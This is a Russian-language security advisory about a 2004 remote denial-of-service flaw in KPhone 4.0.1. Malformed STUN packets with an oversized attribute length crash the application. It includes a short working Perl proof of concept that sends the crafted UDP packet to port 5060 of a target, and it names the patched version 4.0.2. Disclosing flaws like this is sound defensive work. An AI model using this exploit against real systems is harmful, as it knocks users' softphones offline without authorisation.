Удаленный отказ в обслуживании некорректным STUN пакетом в KPhone

Дата публикации:
18.04.2004
Всего просмотров:
789
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: KPhone 4.0.1

Описание: Уязвимость обнаружена в KPhone. Удаленный пользователь может аварийно завершить работу приложения.

Удаленный пользователь может послать специально обработанный STUN пакет (с параметром attrLen более 8000 байт), чтобы аварийно завершить работу приложения целевого пользователя.

Пример/Эксплоит:

#!/usr/bin/perl
 

use IO::Socket::INET;

my $buf = join("", "\x01\x01", # BindingResponse
    "\x00\x01", # MsgLength
    "A"x16, # GUID
    "\x00\x00", # Attribute
    "\x08\x01", # AttrLength
    "A"x7975 # Value
   );

my $remote = IO::Socket::INET->new( Proto => 'udp',
         PeerAddr => '192.168.1.49',
         PeerPort => 5060);

print $remote $buf;

URL производителя:http://www.wirlab.net/kphone/

Решение:Установите обновленную версию программы: http://www.wirlab.net/kphone/kphone-4.0.2.tar.gz

Ссылки: KPhone STUN DoS (Malformed STUN Packets)

или введите имя

CAPTCHA